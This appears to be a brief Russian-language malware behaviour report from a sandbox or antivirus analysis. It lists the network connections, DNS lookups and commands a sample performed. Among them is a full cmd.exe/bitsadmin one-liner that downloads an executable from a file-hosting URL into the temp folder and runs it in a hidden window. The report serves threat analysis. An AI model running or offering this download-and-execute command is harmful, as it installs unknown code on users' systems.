Техническая информация
- '<SYSTEM32>\cmd.exe' /c bitsadmin /transfer a /download /priority high https://a.pomf.cat/hwzawe.exe %tmp%\hwzawe.exe & %tmp%\hwzawe.exe & exit
- 'a.##mf.cat':443
- 'a.##mf.cat':443
- DNS ASK a.##mf.cat
- '<SYSTEM32>\bitsadmin.exe' /transfer a /download /priority high https://a.pomf.cat/hwzawe.exe %TEMP%\hwzawe.exe
- '<SYSTEM32>\cmd.exe' /c bitsadmin /transfer a /download /priority high https://a.pomf.cat/hwzawe.exe %tmp%\hwzawe.exe & %tmp%\hwzawe.exe & exit (со скрытым окном)